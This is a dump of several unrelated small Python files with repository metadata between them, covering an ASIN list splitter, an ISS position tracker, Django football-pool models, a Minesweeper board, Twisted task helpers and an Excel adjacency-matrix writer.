# not_crawl_list.append(item4)
# for item5 in open('/home/ytroot/桌面/info/not_crawl5.txt', 'r').readlines():
# item5 = item5.split('\n')[0]
# not_crawl_list.append(item5)
# for item6 in open('/home/ytroot/桌面/info/not_crawl6.txt', 'r').readlines():
# item6 = item6.split('\n')[0]
# not_crawl_list.append(item6)
# for item7 in open('/home/ytroot/桌面/info/not_crawl7.txt', 'r').readlines():
# item7 = item7.split('\n')[0]
# not_crawl_list.append(item7)
# for item8 in open('/home/ytroot/桌面/info/not_crawl8.txt', 'r').readlines():
# item8 = item8.split('\n')[0]
# not_crawl_list.append(item8)
# for item_y in not_crawl_list:
# not_crawl_file.write(item_y + '\n')
'''把抓过的asin从total_asin_everyday20w文件删掉'''
def lalalla(split_at=400000):
    """Split the crawled ASIN list into a batch file and a remainder file.

    Reads every line of ./Data/snatch/1468148.txt, drops the trailing
    newline and skips blank lines, then appends the first `split_at`
    entries to total_asin_offshelf_part2.txt and the rest to 1468148_.txt,
    one ASIN per line.

    :param split_at: number of ASINs routed to the first output file
        (default 400000, the original hard-coded batch size).
    """
    asins = []
    with open('./Data/snatch/1468148.txt', 'r') as src:
        for line in src:
            asin = line.split('\n')[0]
            # The original compared the stripped value against '\n', which
            # never matches; actually skip empty lines instead.
            if not asin:
                continue
            asins.append(asin)
    # Open each output once instead of re-opening it for every line; 'a'
    # replaces the invalid mode string 'aw' (rejected by Python 3's open()).
    with open('./Data/snatch/total_asin_offshelf_part2.txt', 'a') as part_file:
        for asin in asins[:split_at]:
            part_file.write(asin + '\n')
    with open('./Data/snatch/1468148_.txt', 'a') as rest_file:
        for asin in asins[split_at:]:
            rest_file.write(asin + '\n')
if __name__ == '__main__':
    # Earlier pipeline stages, kept disabled for reference:
    # qvzong()
    # Hebing()
    lalalla()
"liufan.dery@gmail.com"
] | liufan.dery@gmail.com |
de2fcd4054cdbe0af94fee227d9ee853571bed03 | 39a91240698719d2ad420e010558398097f4cd98 | /tracker.py | 26c97ce30d36f23767b5283c059fcb59222dbaf3 | [] | no_license | maxcohen31/iss-tracker | e7b3b7d9584d6a403bab981d45126318165eb9f5 | e6b56443401938ead1ddb36db6d8ed71a11f8b73 | refs/heads/main | 2023-06-03T20:19:56.800614 | 2021-06-17T07:51:29 | 2021-06-17T07:51:29 | 377,188,962 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,882 | py | # Internation Space Station tracker
# Author: Emanuele
import requests
import pandas as pd
import matplotlib.pyplot as plt
import plotly.express as px
# Starting the Tracker class
class Tracker:
    """Fetch and expose the current ISS position and crew from Open Notify."""

    def __init__(self):
        # Raw JSON payloads. self.df holds the position frame with rows
        # 'latitude'/'longitude' and a single 'iss_position' column.
        self.url = requests.get('http://api.open-notify.org/iss-now.json').json()
        self.df = pd.DataFrame.from_dict(self.url)
        self.people_url = requests.get('http://api.open-notify.org/astros.json').json()

    def get_latitude(self):
        """Return the current latitude as a 'Latitude: <value>' string."""
        # Transpose into a local copy: the original reassigned self.df, so a
        # second accessor call operated on an already-transposed frame.
        position = self.df.transpose()
        return f"Latitude: {position['latitude'].iloc[0]}"

    def get_longitude(self):
        """Return the current longitude as a 'Longitude: <value>' string."""
        position = self.df.transpose()
        return f"Longitude: {position['longitude'].iloc[0]}"

    def get_people(self):
        """Return the number of people currently aboard the ISS."""
        self.df_people = pd.DataFrame.from_dict(self.people_url).transpose()
        # The original line ended in a stray ')' (syntax error).
        return self.df_people.loc['number'].iloc[0]

    def get_names(self):
        """Return the names of all astronauts as a list.

        The original returned only the first name because of a `return`
        inside the loop.
        """
        self.df_people = pd.DataFrame.from_dict(self.people_url)  # New dataframe
        return [person['name'] for person in self.df_people['people']]

    def show_position(self):
        """Plot the current ISS position on a world map (mutates self.df)."""
        self.df['latitude'] = self.df.loc['latitude', 'iss_position']    # new 'latitude' column
        self.df['longitude'] = self.df.loc['longitude', 'iss_position']  # new 'longitude' column
        self.df.reset_index(inplace=True)  # flatten the index for plotting
        iss_pos = px.scatter_geo(self.df, lat='latitude', lon='longitude')
        iss_pos.show()
| [
"eman_93@hotmail.it"
] | eman_93@hotmail.it |
afd23258eacb7c4b2e2e5e09bdb7125d42b7a16e | 9173befb29e5819f19cedc4f2eee75c8811acf32 | /PA/test/test_urllib2.py | a6b14238e9a8c312ddfc099b8571e09579495d79 | [] | no_license | Coder-Chandler/Go_1 | 81c43450eb0e00321f5c8c1eadde611620a68d04 | b5dcd01d3fd429a5681bb151fceaf56d6e65c345 | refs/heads/master | 2021-01-20T02:04:11.120918 | 2017-06-26T11:02:16 | 2017-06-26T11:02:16 | 89,365,719 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | import urllib2
import cookielib

# Demo script (Python 2): three ways to fetch the same page with urllib2.
url = 'http://baike.baidu.com/item/Python'

# 1) Plain urlopen on a URL string.
print 'The first method !'
response1 = urllib2.urlopen(url)
print response1.getcode()
print len(response1.read())

# 2) Request object with a custom User-Agent header.
print 'The second method !'
request = urllib2.Request(url)
request.add_header('user-agent', 'Mozilla/5.0')
response2 = urllib2.urlopen(request)
print response2.getcode()
print len(response2.read())

# 3) Globally installed opener with cookie support.
print 'The third method'
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
response3 = urllib2.urlopen(request)
print response3.getcode()
print cj
print response3.read()
| [
"ysiwgtus@gmail.com"
] | ysiwgtus@gmail.com |
dfdf57410ffde803f2a84176e3408295a99ddda8 | d2189145e7be2c836017bea0d09a473bf1bc5a63 | /Practica0PerezAyalaYocoyaniEhecatzin/E4/Conjuntos.py | dd16656709d225a17f9b0c13958027e7fc7be87c | [] | no_license | emilianoNM/Tecnicas3 | 12d10ce8d78803c8d2cd6a721786a68f7ee2809d | 6ad7f0427ab9e23643a28ac16889bca8791421d0 | refs/heads/master | 2020-03-25T18:06:34.126165 | 2018-11-24T04:42:14 | 2018-11-24T04:42:14 | 144,013,045 | 3 | 5 | null | 2018-09-14T10:47:26 | 2018-08-08T12:49:57 | Python | UTF-8 | Python | false | false | 740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 16 18:55:57 2018
@author: yocoy
"""
class Conjuntos:
    """Partition a collection into four buckets relative to [valMin, valMax].

    Bucket c1: values below valMin; c2: values in [valMin, valMax);
    c3: values above valMax; c4: values equal to valMax.
    """

    def __init__(self, conjunto, valMin, valMax):
        self.conjunto = conjunto
        self.valMin = valMin
        self.valMax = valMax
        self.c1 = []
        self.c2 = []
        self.c3 = []
        self.c4 = []

    def hacedor(self):
        """Distribute every element into its bucket and return all four.

        Buckets accumulate across calls (they are never cleared).
        """
        for valor in self.conjunto:
            if valor < self.valMin:
                destino = self.c1
            elif valor < self.valMax:
                destino = self.c2
            elif valor > self.valMax:
                destino = self.c3
            else:
                destino = self.c4
            destino.append(valor)
        return self.c1, self.c2, self.c3, self.c4
"noreply@github.com"
] | emilianoNM.noreply@github.com |
713a555746153178b3e06918761bfa99cd7539a2 | 53c8c1e3e87d2afe0ac032b3622108fcd267b948 | /MineSweeperOLD.py | 1a71607ff0d5937db8a8c62e86274352d164cd75 | [] | no_license | nsantacruz/mineVacuum | bd2a810cbb89c111dee95526218ba5a11c6fed3a | 2c9d1bd0bb139046b26928741e907c5377d784c8 | refs/heads/master | 2020-03-29T14:03:49.190822 | 2014-02-16T17:10:04 | 2014-02-16T17:10:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,024 | py | #UPDATES#
#adjacent arrays now update for both bs and us each time a space is clicked (still needs a bit of work)
#updated to agree with rest of world: the (row, column) standard has been adopted
from Square import *
from GridVisualizer import *
import random
class MineSweeper():
    """Minesweeper board model built on Square objects from Square.py.

    NOTE(review): methods use `this` instead of the conventional `self`,
    and several index expressions mix this.w/this.h with the grid's
    row/column counts — only verified for square boards (wid == hei).
    """
    def __init__(this,wid=9,hei=9,mines=10):
        # Build an empty, fully hidden grid; mines are placed lazily on
        # the first click (see chooseSpace).
        this.grid = []
        this.numMines = mines
        this.mines = []
        this.startedGame = False
        this.h = hei
        this.w = wid
        for y in range(wid):
            this.grid.append([])
            for x in range(hei):
                tempSq = Square(0,vis=False)
                tempSq.setPosition(x,y)
                this.grid[y].append(tempSq)
    def addMines(this,x,y): #parameters signify spot that was clicked, don't add mines around it
        # Randomly place numMines mines, avoiding squares that are already
        # mines (number == -1) and the 3x3 area around the clicked (x, y).
        minesToPlace = this.numMines
        while(minesToPlace>0):
            randY = random.randint(0,this.h-1)
            randX = random.randint(0,this.w-1)
            if this.grid[randY][randX].number != -1 and not (randY in range(y-1,y+2) and randX in range(x-1,x+2)):
                tempMine = Square(-1)
                tempMine.setPosition(randX,randY)
                this.mines.append(tempMine)
                this.grid[randY][randX] = tempMine
                minesToPlace-=1
    def addNumbers(this):
        # Increment the count of every non-mine square adjacent to a mine.
        for mine in this.mines:
            mineX = mine.position[0]
            mineY = mine.position[1]
            #print(mine.number)
            for pos in this.getSurroundingPositions(mineX,mineY):
                if this.grid[pos[1]][pos[0]].number != -1:
                    this.grid[pos[1]][pos[0]].number+=1
    def chooseSpace(this,x,y):
        """Handle a click on (x, y): lazily set up the board, then reveal."""
        #if first click, add mines but not around spot that was clicked
        if not this.startedGame:
            this.addMines(x,y)
            this.addNumbers()
            this.startedGame = True
        revealed = this.revealSpace(x,y)
        this.updateAdjacent(revealed)
    # A recursive reveal: prevRevealedList passes the accumulated list of
    # revealed tiles between recursion levels.
    # Returns the list of revealed tiles (useful for a solver).
    def revealSpace(this,x,y,prevRevealedList=None):
        tempSq = this.grid[y][x]
        # NOTE(review): an explicitly passed *empty* list is falsy and gets
        # replaced by a fresh list here.
        if prevRevealedList:
            revealedList = prevRevealedList
        else:
            revealedList = []
        if not (tempSq.visible or tempSq.flagged):
            if tempSq.number == -1:
                print('Game Over :(')
            #if you found a 0, you can safely reveal all surrounding tiles
            elif tempSq.number == 0:
                tempSq.visible = True
                revealedList.append(tempSq)
                for pos in this.getSurroundingPositions(x,y):
                    this.revealSpace(pos[0],pos[1],prevRevealedList=revealedList)
            else: #number is 1-8
                tempSq.visible = True
                revealedList.append(tempSq)
        #print(len(revealedList)) watch as it grows!
        return revealedList
    # Uses the list of squares that were just revealed to update the
    # adjacency lists of both border squares (bs) and unrevealed squares
    # (us): first loop over the revealed border squares, collecting the
    # unrevealed neighbours so they can be processed afterwards.
    def updateAdjacent(this,revealedSqs):
        unrevealedList = []
        #border squares: each revealed numbered square records hidden neighbours
        for bs in revealedSqs:
            if bs.number == 0:
                continue
            else:
                xPos = bs.position[0]
                yPos = bs.position[1]
                for pos in this.getSurroundingPositions(xPos,yPos):
                    tempSq = this.grid[pos[1]][pos[0]]
                    if not tempSq.visible:
                        bs.addAdj(tempSq)
                        #make sure this is not already in the unrevealedList
                        if not tempSq in unrevealedList:
                            unrevealedList.append(tempSq)
        #unrevealed squares: each records its visible neighbours
        for us in unrevealedList:
            xPos = us.position[0]
            yPos = us.position[1]
            for pos in this.getSurroundingPositions(xPos,yPos):
                tempSq = this.grid[pos[1]][pos[0]]
                if tempSq.visible:
                    us.addAdj(tempSq)
    # give it an x,y position and it returns all the valid positions directly adjacent
    def getSurroundingPositions(this,X,Y):
        # Returns (x, y) tuples for the in-bounds cells of the 3x3
        # neighbourhood centred on (X, Y), including (X, Y) itself.
        posList = []
        for y in range(Y-1,Y+2):
            if y >= 0 and y < this.h:
                for x in range(X-1,X+2):
                    if x >= 0 and x < this.w:
                        posList.append((x,y))
        return posList
# Demo driver: build a standard 9x9 board with 10 mines, click the top-left
# corner, then hand the game to the visualizer.
ms = MineSweeper(wid=9,hei=9, mines=10)
ms.chooseSpace(0,0)
#print(len(ms.grid[0][2].adjacent))
visualize(ms)
| [
"noahssantacruz@gmail.com"
] | noahssantacruz@gmail.com |
b177eac8b5c5e6190923e5b18cf0a21b24710473 | 7326629ac2c3ea608ca55b95ff60d26e0b9a1ab8 | /app/models.py | 81e7434847987e1d8eab9d28197cce92fb69b7cc | [] | no_license | HenryGBC/quiniela | 22b72946ae19ffa8f39b72d737830c63109a53a1 | bfa62cd086dd197b563494c685211d889c962ec4 | refs/heads/master | 2021-01-19T17:41:53.223050 | 2014-02-11T15:30:57 | 2014-02-11T15:30:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,408 | py | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Fecha(models.Model):
    # One matchday of the pool, identified by a short text code (e.g. "1").
    fecha = models.CharField(max_length = 2)
    fechaInicio = models.DateField()  # first day of the matchday
    fechaFin = models.DateField()     # last day of the matchday
    def __unicode__(self):
        return self.fecha
class Resultado(models.Model):
    """A user's predicted score for one match of a given matchday."""
    # on_delete=models.CASCADE matches the pre-Django-2.0 implicit default
    # and keeps the declaration valid on Django 2.0+.
    usuario = models.ForeignKey(User, on_delete=models.CASCADE)
    fecha = models.ForeignKey(Fecha, on_delete=models.CASCADE)
    local = models.CharField(max_length = 100)
    marcadorLocal = models.IntegerField(default = 0)
    visitante = models.CharField(max_length = 100)
    marcadorVisitante = models.IntegerField(default = 0)
    puntos = models.IntegerField()
    fechaGuardada = models.BooleanField(default = False)   # prediction locked in
    puntajeCalculado = models.BooleanField(default = False)  # points already scored
    def __unicode__(self):
        return "%s - %s" % (self.usuario, self.fecha)
class Partido(models.Model):
    """A scheduled match; slugs are derived from the team names on save."""
    # on_delete=models.CASCADE matches the pre-Django-2.0 implicit default.
    fecha = models.ForeignKey(Fecha, on_delete=models.CASCADE)
    local = models.CharField(max_length=100)
    visitante = models.CharField(max_length=100)
    fechaPartido= models.DateField()
    sluglocal = models.SlugField(max_length=100, blank=True)
    slugvisitante = models.SlugField(max_length=100, blank=True)
    def save(self, *args, **kwargs):
        # Regenerate both slugs on every save so they track name changes.
        self.sluglocal = self.local.lower().replace(' ','-')
        self.slugvisitante = self.visitante.lower().replace(' ','-')
        super(Partido, self).save(*args, **kwargs)
    def __unicode__(self):
        return "%s - %s - %s " % (self.fecha, self.local, self.visitante)
class PartidoFinal(models.Model):
    """A finished match with its real score."""
    # on_delete=models.CASCADE matches the pre-Django-2.0 implicit default.
    fecha = models.ForeignKey(Fecha, on_delete=models.CASCADE)
    local = models.CharField(max_length=100)
    marcadorLocal = models.IntegerField(default = 0)
    visitante = models.CharField(max_length=100)
    marcadorVisitante = models.IntegerField(default = 0)
    fechaPartido= models.DateField()
    def __unicode__(self):
        return "%s - %s - %s " % (self.fecha, self.local, self.visitante)
class Usuario(models.Model):
    """Profile data attached to a Django auth user."""
    # on_delete=models.CASCADE matches the pre-Django-2.0 implicit default.
    usuario = models.ForeignKey(User, on_delete=models.CASCADE)
    nombre = models.CharField(max_length= 100)
    moroso = models.BooleanField(default=False)  # True when payment is overdue
    puntos = models.IntegerField()  # accumulated pool points
    def __unicode__(self):
        return self.nombre
class FechaAJugar(models.Model):
    # Marker of which matchday is currently in play (stored as text code).
    fechaEnJuego = models.CharField(max_length= 2)
    def __unicode__(self):
        return "Fecha %s en juego" % (self.fechaEnJuego)
class TablaFecha(models.Model):
    """Per-matchday standings row: the points one user earned on one matchday."""
    # on_delete=models.CASCADE matches the pre-Django-2.0 implicit default.
    fecha = models.ForeignKey(Fecha, on_delete=models.CASCADE)
    usuario = models.ForeignKey(User, on_delete=models.CASCADE)
    puntos = models.IntegerField(default=0)
    def __unicode__(self):
        return "%s - %s - %s" %(self.fecha, self.usuario, self.puntos)
"henry.bravo89@gmail.com"
] | henry.bravo89@gmail.com |
7132bef4d76833c2866aaccc5b4dce37682cb7e5 | 4b27a7e99c55a343cb845d085dd88aa7e77a8079 | /reading.py | e4cdb2c32e224e29e2ea14e277493584ec7edce1 | [] | no_license | damodardikonda/Python-Pandas- | a1f0395a9514dbb639116d35ae465b7135d92c2c | de95146cbb01047d87a5bb297d94c21181dbd629 | refs/heads/master | 2022-09-19T01:25:31.985004 | 2020-06-05T07:35:44 | 2020-06-05T07:35:44 | 269,561,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | import pandas as pd
import numpy as np
# Read files.csv three ways: indexed by Name, with an explicit column dtype,
# and with custom headers while skipping the first two rows.
df = pd.read_csv("files.csv", index_col=['Name'])
print(df)
print('\n\n changingthe type of float, ')
# np.float was deprecated in NumPy 1.20 and removed in 1.24; np.float64 is
# the equivalent concrete dtype.
df1 = pd.read_csv("files.csv", dtype={'Salary': np.float64})
print(df1.dtypes)
print("df headers")
df2 = pd.read_csv("files.csv", names=['A','B','C','D','E'], skiprows=2)
print(df2)
| [
"damodar2dikonda@gmail.com"
] | damodar2dikonda@gmail.com |
48a06adba43b3407a9e9c44ca62636abccd4368d | e531794fab5a6c0c670fe7eb1f19e307b5921ffd | /learning_journal/learning_journal/scripts/initializedb.py | 9b0a914a45acd7633528b50182c09e5b2571689b | [] | no_license | shoaib369/learning-journal | ff961b104e235a8faa6a105c91733771cf01cfe9 | 2084a4bb9f6410f3f7918e8ecd2dc2ecaff2680c | refs/heads/master | 2020-06-03T11:42:21.059112 | 2015-04-10T05:34:34 | 2015-04-10T05:34:34 | 33,709,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 909 | py | import os
import sys
import transaction
from sqlalchemy import engine_from_config
from pyramid.paster import (
get_appsettings,
setup_logging,
)
from pyramid.scripts.common import parse_vars
from ..models import (
DBSession,
MyModel,
Base,
)
def usage(argv):
    """Print command-line usage for this script and exit with status 1."""
    prog = os.path.basename(argv[0])
    message = ('usage: %s <config_uri> [var=value]\n'
               '(example: "%s development.ini")' % (prog, prog))
    print(message)
    sys.exit(1)
def main(argv=sys.argv):
    """Console entry point: create the DB schema for the given config file.

    Expects a Pyramid config URI as the first argument, with optional
    ``var=value`` overrides afterwards; exits via usage() when missing.
    """
    if len(argv) < 2:
        usage(argv)
    config_uri = argv[1]
    options = parse_vars(argv[2:])
    setup_logging(config_uri)
    settings = get_appsettings(config_uri, options=options)
    engine = engine_from_config(settings, 'sqlalchemy.')
    DBSession.configure(bind=engine)
    # Create every table known to the declarative Base.
    Base.metadata.create_all(engine)
    # Seed-data snippet, kept disabled for reference:
    # with transaction.manager:
    #     model = MyModel(name='two', value=1)
    #     DBSession.add(model)
| [
"shoaib.maks@live.com"
] | shoaib.maks@live.com |
eb2025415cacf09b3f30f758ba273518c5712b56 | d3adb94b12bdbb041b05d60f36386251a5b3ed89 | /forms.py | 49827eb8693b2e0657fb008b5c533f77a224e802 | [] | no_license | 100ballovby/PyOWM_Flask | 44f11aeac00512fffa43ad2493b25f727006cd36 | 720d0af81c52debdda4be440db8007b620e95c0f | refs/heads/master | 2023-03-23T22:41:02.780567 | 2021-03-16T17:11:06 | 2021-03-16T17:11:06 | 346,085,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 179 | py | from wtforms import StringField, SubmitField
from flask_wtf import FlaskForm
class SearchForm(FlaskForm):
    # One-field form used to look up weather by city name.
    city = StringField('City name')
    submit = SubmitField('Submit')
| [
"greatraksin@icloud.com"
] | greatraksin@icloud.com |
7e2dee67cc6ec9f0d5655e38183c4b713eefd8f5 | fe62f810f4256b6811068ac2d2e27a2d9ab79ea7 | /setup.py | 77ba600e447a6c3279fec271e5d59b2081f225fa | [] | no_license | DavidPerezGomez/MySQLConnector | 06a3e20ae8ac36996d4550271a3193c7300d39b4 | 05459b32c3db1b5b5170f377c71c04b1d2fe8333 | refs/heads/master | 2021-05-04T05:24:15.964899 | 2018-02-05T18:46:07 | 2018-02-05T18:46:07 | 120,338,002 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | from distutils.core import setup
# Minimal distutils packaging script for the mysqlconnector module.
setup(name='mysqlconnector',
      version='1.0',
      description='',
      author='',
      author_email='',
      url='',
      # py_modules takes dotted module names, not file-system paths;
      # the original 'mysqlconnector/connector' could never be resolved.
      py_modules=['mysqlconnector.connector'],
      )
| [
"davidperezgo@gmail.com"
] | davidperezgo@gmail.com |
6d3a3293e455a01c45e56bcb29d7751c226dc716 | 9546d8f6f675a9bfb1460a175ce9c4586af69107 | /blog/migrations/0004_post_tags.py | 95298454102691cd749448ad7c9f07ff17737d0c | [] | no_license | zmm064/DjangoByExample1_Blog | c759a493b7409cee7303259273a369ac970623da | 1db8e0a0290b70449df431966a89c949e39a0505 | refs/heads/master | 2021-04-06T08:03:50.040622 | 2018-03-17T03:10:56 | 2018-03-17T03:10:56 | 125,333,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2018-03-15 13:11
from __future__ import unicode_literals
from django.db import migrations
import taggit.managers
class Migration(migrations.Migration):
    # Auto-generated migration: adds the django-taggit 'tags' manager to the
    # blog Post model. Avoid hand-editing the operations below.

    dependencies = [
        ('taggit', '0002_auto_20150616_2121'),
        ('blog', '0003_auto_20180315_1940'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='tags',
            field=taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags'),
        ),
    ]
| [
"zmm064@foxmail.com"
] | zmm064@foxmail.com |
c4cb2bb9a3fd2e5a3cfd94ecee5a4e52926d2aa9 | 5641c3ec4c812aac6e1581e8f72ac0a644566e1c | /Data/writeExcel.py | 6b854290c86b4225850ddf9ffcd9a89721e4ba4e | [] | no_license | ralowden/B490-Project | b001376f6c63730e8c53b6c8a429fab61c67d44f | abb9701f7dfe9776b924263eba29d90db9ec0ded | refs/heads/master | 2021-01-01T18:02:27.590903 | 2014-11-10T06:19:27 | 2014-11-10T06:19:27 | 26,420,886 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,232 | py | from __future__ import print_function
from openpyxl import load_workbook
import xlsxwriter
import sys
import string
# Build an adjacency-matrix .xlsx from an edge-list file given on the
# command line. argv[1]: whitespace-separated "src dst" edge file;
# argv[2]: k, used by the (commented-out) coordinate-reading section below.
if len(sys.argv) < 2:
    sys.exit("Error: need filename as input")
fileName = sys.argv[1]
fileNameWithoutExt = fileName.split(".")
newFile = fileNameWithoutExt[0] + ".xlsx"
readfilename = "3980edges_V.xlsx"
coordFile = open("coordFile.txt", 'a')
k = int(sys.argv[2])

# edges maps source node -> list of destination nodes; values collects every
# destination seen (a set replaces the original O(n) list-membership test).
edges = {}
values = set()
with open(fileName) as edgeFile:
    for line in edgeFile:
        # str.split() replaces the Python-2-only string.split() helper.
        entries = line.split()
        key = int(entries[0])
        value = int(entries[1])
        edges.setdefault(key, []).append(value)
        values.add(value)

# Node list = every source plus every destination, sorted.
keys = sorted(edges.keys())
for value in sorted(values):
    if value not in keys:
        keys.append(value)
keys = sorted(keys)

# Create a workbook and add a worksheet.
workbook = xlsxwriter.Workbook(newFile)
worksheet = workbook.add_worksheet()

# Fill the headings of the adjacency matrix; LUT maps the 1-based
# row/column index to the node id it represents.
LUT = {}
for i in range(1, len(keys) + 1):
    worksheet.write(i, 0, keys[i-1])
    worksheet.write(0, i, keys[i-1])
    LUT[i] = keys[i-1]

# Fill the adjacency matrix: 1 where an edge key->value exists, else 0.
for col in range(1, len(keys) + 1):
    key = LUT[col]
    for row in range(1, len(keys) + 1):
        value = LUT[row]
        if key in edges and value in edges[key]:
            worksheet.write(row, col, 1)
        else:
            worksheet.write(row, col, 0)
workbook.close()
print("Successfully written to disk")
#Read data from values
"""wb = load_workbook(filename = readfilename)
ws_unnorm = wb.get_sheet_by_name(name = "Unnormalized")
ws_sym = wb.get_sheet_by_name(name = "Symmetric")
ws_rw = wb.get_sheet_by_name(name = "Random-walk")
row_num = 1;
for row in ws_unnorm.rows:
col_num = 1
coord_str = str(row_num) + " "
for cell in row:
if not col_num == 1:
coord_str += str(cell.internal_value) + " "
if col_num > k:
coordFile.write(coord_str + "\n")
break
col_num += 1
row_num += 1
coordFile.close() """
| [
"ralowden@indiana.edu"
] | ralowden@indiana.edu |
852776831fbe3219e5e605068c4a63a6d938466a | 2264cb3fbb52512f33a95bc93a4379b0329a05fb | /Recommendation/Jenny/rec_py/recSys.py | 5a88d34254153bd6d14940e3c081b201328d6eaf | [] | no_license | mengqwang2/AlibabaChallenge | 6b9a1cb90ba976005e1a3d489461993dadf3ef96 | a42cca07af4ce60615b43651d13d9ab5604cc860 | refs/heads/master | 2021-01-19T11:34:25.061280 | 2015-06-08T16:59:00 | 2015-06-08T16:59:00 | 37,080,200 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | import sys
import os
import data_process
if __name__=="__main__":
    # Hard-coded input dataset; the five CLI arguments are integer weights
    # passed straight to data_process (presumably one per user-action
    # type/rating bucket — confirm against data_process.py).
    filepath="/Users/mengqwang/Documents/tMall/clean_t_alibaba_data.csv"
    ratio0=int(sys.argv[1])
    ratio1=int(sys.argv[2])
    ratio2=int(sys.argv[3])
    ratio3=int(sys.argv[4])
    ratio4=int(sys.argv[5])
    # Convert raw action logs to ratings and write the result out.
    dp=data_process.data_process(filepath,ratio0,ratio1,ratio2,ratio3,ratio4)
    dp.action2rate()
    dp.dataOutput()
| [
"mengqwang2@gmail.com"
] | mengqwang2@gmail.com |
e9088dc481b384e7b3573deadfeb6d01d3be9eb8 | b5faf7fab5877bb89dd57e3511311587e17d5c30 | /youey/card.py | ecdf59bce9fc5beb61c5de10166954183bf24207 | [
"Unlicense"
] | permissive | wijijo/youey | f52eef9dee427f3b1a577836f328b03450e21531 | 4986f3cdf88a27c204d2d1023fd8ab3954d6060a | refs/heads/master | 2021-10-14T08:29:20.333345 | 2019-02-03T08:39:25 | 2019-02-03T08:39:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | #coding: utf-8
from youey.view import *
from youey.label import *
class CardView(View):
    # Card-shaped container view sized to the parent's grid.
    def setup(self):
        super().setup()
        # GridSize presumably derives the card dimensions from the parent
        # layout — confirm against youey.view.
        self.size = GridSize(self.parent)
    def render(self):
        # Inner div is inert (pointer-events: none) and clips overflowing text.
        return f'<div id=\'{self.id}\' style=\'position: relative; box-sizing: border-box; overflow: hidden; text-overflow: ellipsis; pointer-events: none;\'></div>'
class StyledCardView(CardView):
    # CardView variant that picks up colors and spacing from the active theme.
    def apply_theme(self):
        super().apply_theme()
        t = self.theme
        self.border = t.on_background
        #self.border_top = t.primary_variant, 10
        self.shadow = t.shadow
        self.margin = t.margin
        self.border_radius = t.border_radius
| [
"mikael.honkala@gmail.com"
] | mikael.honkala@gmail.com |
33922d76382941b02c8ceb0bcb46d6d3955660e8 | 48032a202c5dadecb218a13fe08d079e96bd1c9e | /quarry/utils/tasks.py | 942e7a475e06d34860414c4cffb141f12c653b5d | [
"MIT-feh"
] | permissive | aaps/quarry | e7de4c827e6a581d97bbb165ba6d154b961c4347 | 181bccf99bbcfc1d0c46ac3d9790ba461263ac4d | refs/heads/master | 2021-01-17T05:21:04.087296 | 2015-10-09T10:32:44 | 2015-10-09T10:32:44 | 43,808,598 | 1 | 0 | null | 2015-10-07T10:23:46 | 2015-10-07T10:23:46 | null | UTF-8 | Python | false | false | 837 | py | from twisted.internet import reactor
from twisted.internet.task import LoopingCall
class Tasks(object):
    """Registry of Twisted timed tasks that can all be stopped at once."""

    def __init__(self):
        # Every task ever scheduled, in creation order.
        self._tasks = []

    def add_loop(self, time, callback, *args):
        """Schedule `callback(*args)` every `time` seconds; returns the loop."""
        loop = LoopingCall(callback, *args)
        loop.start(time, now=False)
        self._tasks.append(loop)
        return loop

    def add_delay(self, time, callback, *args):
        """Run `callback(*args)` once after `time` seconds.

        The returned delayed call gains stop()/restart() helpers that are
        no-ops once the call has fired or been cancelled.
        """
        delayed = reactor.callLater(time, callback, *args)

        def stop():
            if delayed.active():
                delayed.cancel()

        def restart():
            if delayed.active():
                delayed.reset(time)

        delayed.restart = restart
        delayed.stop = stop
        self._tasks.append(delayed)
        return delayed

    def stop_all(self):
        """Stop and forget every registered task."""
        while self._tasks:
            self._tasks.pop(0).stop()
"barney.gale@gmail.com"
] | barney.gale@gmail.com |
77a7b1b539d3ed002cf33ecbfca26cbb2d0b6a61 | e72671d153166d8e9aecbbc746d73bf98874fade | /tools/WriteSetup_Testbed_Server.py | f531f03c748d19237966b31450cf5e43924fffbb | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | abhilashabhardwaj/pike | 53d5f1795960a2b71b6d0ed22f1183b4ae4c4715 | 7c11307a702ffacadb370427505fdd9c8ad52f0f | refs/heads/master | 2022-11-14T01:22:53.107392 | 2022-10-11T10:16:27 | 2022-10-11T10:16:27 | 20,185,390 | 0 | 0 | NOASSERTION | 2020-02-20T05:33:34 | 2014-05-26T12:28:05 | Python | UTF-8 | Python | false | false | 2,739 | py | import os;
import sys;
def CreateFile(size, name):
    # Create a file of `size` bytes named `name` in the current directory
    # (Python 2 code: print statements and long()).
    try:
        fname = name;
        print fname;
        fh = open(fname, 'w')
        # NOTE(review): if open() fails, `fh` is unbound and the finally
        # clause raises NameError, masking the original error.
        filesize = long(size)
        print "Creating a file of %d Bytes with name as %s in present directory\n"%(filesize, fname);
        print "filesize is %d bytes\n"%filesize
        if size<128:
            # Small files are filled one 'x' byte at a time.
            for i in range(size):
                fh.write("x")
        else:
            # Larger files are written in 128-byte chunks of a fixed pattern.
            # NOTE(review): integer division truncates, so sizes that are not
            # a multiple of 128 come out short by (size % 128) bytes.
            chunk=(filesize/128);
            print "Creating a file of %d Bytes with name as %s in present directory\n"%(filesize, fname);
            for i in range(chunk):
                #while (os.path.getsize(fname) < filesize):
                fh.write ("900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface900dface")
    finally:
        fh.close()
